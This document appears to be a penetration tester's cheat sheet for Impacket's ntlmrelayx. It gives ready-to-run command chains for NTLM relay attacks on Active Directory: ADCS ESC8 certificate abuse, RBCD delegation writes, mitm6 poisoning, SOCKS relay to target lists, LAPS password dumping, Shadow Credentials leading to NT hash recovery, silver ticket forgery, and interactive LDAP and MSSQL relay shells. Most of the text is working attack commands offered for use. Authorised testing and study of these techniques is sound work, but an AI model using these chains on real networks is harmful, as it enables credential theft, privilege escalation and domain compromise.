# ntlmrelayx.py

ntlmrelayx.py is part of Impacket.

# Install

I usually use the embedded version in exegol, but that doesn't always play nice, so I like to go:

python3 -m venv venv
source venv/bin/activate
pip install impacket

Then run the scripts directly; a pip install puts them on PATH with their .py suffix, so:

ntlmrelayx.py

# Logging output

ntlmrelayx YOUR-COMMANDS --output-file output.log

# Add date/timestamp to logs

Add -ts somewhere in the command:

-ts

# Relaying with ADCS ESC8 attack

-t points at the CA's web enrollment endpoint (ESC8). Pick --template to match the account you relay: DomainController when you coerce a DC (ntlmrelayx otherwise defaults to Machine for names ending in $ and User for everything else). Web enrollment has to accept NTLM over HTTP, or over HTTPS without Extended Protection, for the relayed authentication to land:

ntlmrelayx -t http://ca.domain.com/certsrv/certfnsh.asp -smb2support --adcs -debug --template 'DomainController'

# Escalate privileges via relay

If you've already added a computer object you control (using something like powermad or Impacket's addcomputer.py), you can relay a victim machine account's authentication to LDAP and have ntlmrelayx write resource-based constrained delegation (msDS-AllowedToActOnBehalfOfOtherIdentity) on the victim, naming your computer object. For example:

ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$

Relaying SMB to LDAP fails, because Windows SMB clients set the NTLM signing flag and the DC's LDAP service honors it; the victim has to authenticate over HTTP instead. So if you've found a system running WebClient, coerce it (PetitPotam, coercer, etc.) to a WebDAV path on a single-label DNS record you've added for your machine. A name without dots stays in the Intranet zone, so the machine account authenticates automatically and the privesc goes through. With the RBCD in place, getST.py with your computer account's credentials (S4U2self then S4U2proxy) gets you a service ticket for the victim as an admin.

# Delegate access attack while poisoning with mitm6

-6 makes ntlmrelayx listen on IPv6 for the clients mitm6 has poisoned, and -wh is the WPAD host they'll be told to use (pick a name that doesn't exist in the real DNS so only mitm6 answers for it). --delegate-access here creates a new computer account and writes RBCD on each relayed machine; creating that account means setting a password over LDAP, which the DC only accepts over TLS, hence ldaps://:

ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access

# Set up SOCKS relay to a list of hosts

In this example we have a targets.txt file full of entries like this:

smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6

We set up the SOCKS relay like so. The SOCKS server listens on 127.0.0.1:1080 by default; type socks in the ntlmrelayx console to see which sessions it is holding, then point proxychains at that port and run Impacket tools against a listed target with -no-pass and the domain/user of the held session (ntlmrelayx answers the authentication for you):

ntlmrelayx.py -tf targets.txt -smb2support -socks

# Dumping LAPS passwords

If all you want from the relay is the LAPS passwords (assuming you're lucky enough to relay a credential that can read them, such as a DA), skip the domain dump and the DA-account creation and ask for the LAPS dump only. No account gets created, so plain ldap:// is fine here:

ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps

# Shadow Credentials attack

My favorite write-up on this attack is probably this one from GuidePoint Security.

# Find hosts with WebClient running

The webclientservicescanner tool works well for this: it checks each host over SMB for the DAV RPC SERVICE named pipe that only exists while WebClient is running.

# Add a rogue DNS record pointing to your machine

Try dnstool.py (from krbrelayx) for this. Use a single-label record name, since WebClient only authenticates automatically to hosts it considers Intranet zone.

# Setup relay for the Shadow Credentials attack

The usual case is relaying the victim computer's own authentication (coerced over WebDAV) with --shadow-target set to that same computer: a computer account is allowed to write its own msDS-KeyCredentialLink, which is what makes this work. --no-validate-privs stops ntlmrelayx from skipping the session because the relayed account doesn't look privileged, and --no-dump/--no-da keep it from doing anything else:

ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da

# Trigger HTTP auth from VICTIMS

Head to our coercer page for more info.

# Use the PFX to get a TGT

gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass WHATEVER-PASS-IS domain.com/VICTIM$ cert.ccache
export KRB5CCNAME=cert.ccache

This will print a bunch of information including the AS-REP encryption key. With the TGT in KRB5CCNAME, getnthash.py uses that key to decrypt the PAC from a U2U ticket and recover the account's NT hash (the domain/identity is a required positional):

getnthash.py -dc-ip IP.OF.A.DC -key XXXENCRYPTION KEY GOES HEREXXX domain.com/VICTIM$

With the NT hash of the machine account you can forge a silver ticket for a service on that machine. First get the SID of the domain. One way is to query the Administrator account's objectSid: the domain SID is that value with the trailing RID (-500) removed, so be sure to strip it before the ticketer.py command that follows. Impacket's lookupsid.py also prints the domain SID directly.

pywerview.py get-adobject -d domain.com -u lowpriv -p 'password' -t IP.OF.A.DOMAINCONTROLLER --sam-account-name administrator --attributes objectsid

Forge the ticket!

ticketer.py -domain domain.com -domain-sid xxxBE SURE TO LEAVE OFF THE RID!!!xxx -nthash yyy -spn cifs/VICTIMSYSTEM.domain.com administrator

ticketer.py saves administrator.ccache. Export that as KRB5CCNAME and use Kerberos (-k -no-pass) against VICTIMSYSTEM.domain.com, the exact host the cifs SPN names; the ticket is good for nothing else.

# Shadow Credentials attack (with LDAP shell)

I followed these instructions to pwn the HTB: Mist machine for this.

# Get a venv setup

python3 -m venv venv
source venv/bin/activate

# Install the appropriate impacket fork

git clone -b interactive-ldap-shadow-creds https://github.com/Tw1sm/impacket.git
cd impacket
pip install --upgrade pip
pip install .
pip install setuptools

# Run ntlmrelayx as root

It binds ports 80 and 445, so it needs root, and sudo doesn't carry the activated venv along. Call the venv's interpreter explicitly, from the directory where you created the venv and cloned the fork:

sudo ./venv/bin/python3 impacket/examples/ntlmrelayx.py -smb2support -t ldap://ip.of.a.dc -i

# Interact with the relay

Once a session has been relayed, the interactive LDAP shell is bound to 127.0.0.1:11000 (further sessions take the next ports up):

nc 127.0.0.1 11000

# Relay to MSSQL with interactive shell

-i again gives an interactive shell, this time an MSSQL one, bound to 127.0.0.1:11000 like the LDAP shell above:

ntlmrelayx -t mssql://192.168.7.7 -i -ts -smb2support